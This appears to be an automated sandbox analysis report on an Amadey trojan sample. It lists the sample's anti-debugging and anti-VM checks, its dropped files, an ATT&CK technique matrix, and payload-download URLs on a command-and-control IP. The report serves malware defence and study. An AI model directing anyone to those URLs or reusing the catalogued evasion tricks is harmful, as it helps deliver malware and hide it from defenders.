Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90DB3 second address: 4D90DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA5Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90DC5 second address: 4D90DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90D24 second address: 4D90D29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90D29 second address: 4D90D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F73F90B68EAh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F73F90B68EAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90D4B second address: 4D90D5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F910AA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90D5A second address: 4D90D87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73F90B68EDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4D90D87 second address: 4D90D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73F910AA5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA04ED second address: 4DA0550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F73F90B68F3h 0x00000011 adc ax, 9B9Eh 0x00000016 jmp 00007F73F90B68F9h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F73F90B68EDh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA0550 second address: 4DA0556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA0556 second address: 4DA055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA055A second address: 4DA055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA055E second address: 4DA0576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F73F90B68EBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA0576 second address: 4DA05AD instructions: 0x00000000 rdtsc 0x00000002 mov ax, 5A3Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73F910AA64h 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F73F910AA67h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA05AD second address: 4DA05B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 4DA0366 second address: 4DA036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Special instruction interceptor: First address: 9BDD8E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Special instruction interceptor: First address: 81A16E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Special instruction interceptor: First address: 9E8884 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Special instruction interceptor: First address: 9C9952 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Special instruction interceptor: First address: A4EE80 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion			Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00A9F7DE rdtsc

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window / User API: threadDelayed 1079			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window / User API: threadDelayed 1213			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window / User API: threadDelayed 1181			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window / User API: threadDelayed 1087			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Window / User API: threadDelayed 1183			Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\KdYG3fvBdfevG5\Y-Cleaner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

API coverage: 9.2 %

Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 3896	Thread sleep count: 64 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 3896	Thread sleep time: -128064s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6776	Thread sleep count: 89 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6904	Thread sleep count: 1079 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6904	Thread sleep time: -2159079s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6776	Thread sleep count: 207 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6776	Thread sleep count: 92 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6776	Thread sleep count: 86 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6776	Thread sleep count: 78 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 2192	Thread sleep count: 1213 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 2192	Thread sleep time: -2427213s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6992	Thread sleep count: 1181 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6992	Thread sleep time: -2363181s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 7104	Thread sleep count: 1087 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 7104	Thread sleep time: -2175087s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6956	Thread sleep count: 1183 > 30			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe TID: 6956	Thread sleep time: -2367183s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00415D07 FindFirstFileExW,		0_2_00415D07
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_10007EA9 FindFirstFileExW,		0_2_10007EA9
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B55F6E FindFirstFileExW,		0_2_04B55F6E

Source: WwVs3PavPg.exe, WwVs3PavPg.exe, 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: WwVs3PavPg.exe, 00000000.00000002.3075218160.0000000005586000.00000004.00000020.00020000.00000000.sdmp, WwVs3PavPg.exe, 00000000.00000003.2893028114.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, WwVs3PavPg.exe, 00000000.00000002.3071636277.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WwVs3PavPg.exe, 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Thread information set: HideFromDebugger

Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D518D3 Start: 04D5191D End: 04D518A6		0_2_04D518D3
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50950 Start: 04D512DC End: 04D50921		0_2_04D50950

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File opened: NTICE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File opened: SICE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00A9F7DE rdtsc

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CF2A6F mov eax, dword ptr fs:[00000030h]		0_3_04CF2A6F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_3_04CEE30D mov eax, dword ptr fs:[00000030h]		0_3_04CEE30D
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0041366F mov eax, dword ptr fs:[00000030h]		0_2_0041366F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0040EF0D mov eax, dword ptr fs:[00000030h]		0_2_0040EF0D
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h]		0_2_10007A76
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h]		0_2_10005F25
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00D3985B push dword ptr fs:[00000030h]		0_2_00D3985B
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B40D90 mov eax, dword ptr fs:[00000030h]		0_2_04B40D90
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B538D6 mov eax, dword ptr fs:[00000030h]		0_2_04B538D6
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4092B mov eax, dword ptr fs:[00000030h]		0_2_04B4092B
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4F174 mov eax, dword ptr fs:[00000030h]		0_2_04B4F174
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D500D2 mov eax, dword ptr fs:[00000030h]		0_2_04D500D2
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D502DE mov eax, dword ptr fs:[00000030h]		0_2_04D502DE
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D500EF mov eax, dword ptr fs:[00000030h]		0_2_04D500EF
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50095 mov eax, dword ptr fs:[00000030h]		0_2_04D50095
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D500B3 mov eax, dword ptr fs:[00000030h]		0_2_04D500B3
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D502BD mov eax, dword ptr fs:[00000030h]		0_2_04D502BD
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D502A1 mov eax, dword ptr fs:[00000030h]		0_2_04D502A1
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5025C mov eax, dword ptr fs:[00000030h]		0_2_04D5025C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5005F mov eax, dword ptr fs:[00000030h]		0_2_04D5005F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5005F mov eax, dword ptr fs:[00000030h]		0_2_04D5005F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50047 mov eax, dword ptr fs:[00000030h]		0_2_04D50047
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50047 mov eax, dword ptr fs:[00000030h]		0_2_04D50047
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5027C mov eax, dword ptr fs:[00000030h]		0_2_04D5027C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5007E mov eax, dword ptr fs:[00000030h]		0_2_04D5007E
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5026C mov eax, dword ptr fs:[00000030h]		0_2_04D5026C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50217 mov eax, dword ptr fs:[00000030h]		0_2_04D50217
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50000 mov eax, dword ptr fs:[00000030h]		0_2_04D50000
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50000 mov eax, dword ptr fs:[00000030h]		0_2_04D50000
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5000A mov eax, dword ptr fs:[00000030h]		0_2_04D5000A
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5000A mov eax, dword ptr fs:[00000030h]		0_2_04D5000A
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5022D mov eax, dword ptr fs:[00000030h]		0_2_04D5022D
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D501F9 mov eax, dword ptr fs:[00000030h]		0_2_04D501F9
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5019E mov eax, dword ptr fs:[00000030h]		0_2_04D5019E
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D501AF mov eax, dword ptr fs:[00000030h]		0_2_04D501AF
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5014F mov eax, dword ptr fs:[00000030h]		0_2_04D5014F
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5031A mov eax, dword ptr fs:[00000030h]		0_2_04D5031A
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50136 mov eax, dword ptr fs:[00000030h]		0_2_04D50136
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D5013C mov eax, dword ptr fs:[00000030h]		0_2_04D5013C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04D50123 mov eax, dword ptr fs:[00000030h]		0_2_04D50123

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00402C70 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_0040C0B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0040C0B3
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00409949 SetUnhandledExceptionFilter,		0_2_00409949
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_00408ED5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_00408ED5
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_004097B2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_004097B2
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_10002ADF
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_100056A0
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_10002FDA
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4913C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_04B4913C
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B49A19 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04B49A19
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B49BB0 SetUnhandledExceptionFilter,		0_2_04B49BB0
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	Code function: 0_2_04B4C31A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_04B4C31A

Source: WwVs3PavPg.exe, WwVs3PavPg.exe, 00000000.00000002.3069516453.00000000009A2000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: CbProgram Manager

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_3_04CE8DB3 cpuid

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\WwVs3PavPg.exe

Code function: 0_2_00409BE5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	2 Process Injection	11 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	681 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	12 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Process Injection	Security Account Manager	24 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	223 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WwVs3PavPg.exe	61%	ReversingLabs	Win32.Trojan.Amadey
WwVs3PavPg.exe	100%	Avira	HEUR/AGEN.1320706
WwVs3PavPg.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.156.73.23/files/download	false		high
http://185.156.73.23/dll/key	false		high
http://185.156.73.23/soft/download	false		high
http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp	false		high
http://185.156.73.23/dll/download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.10.dr	false		high
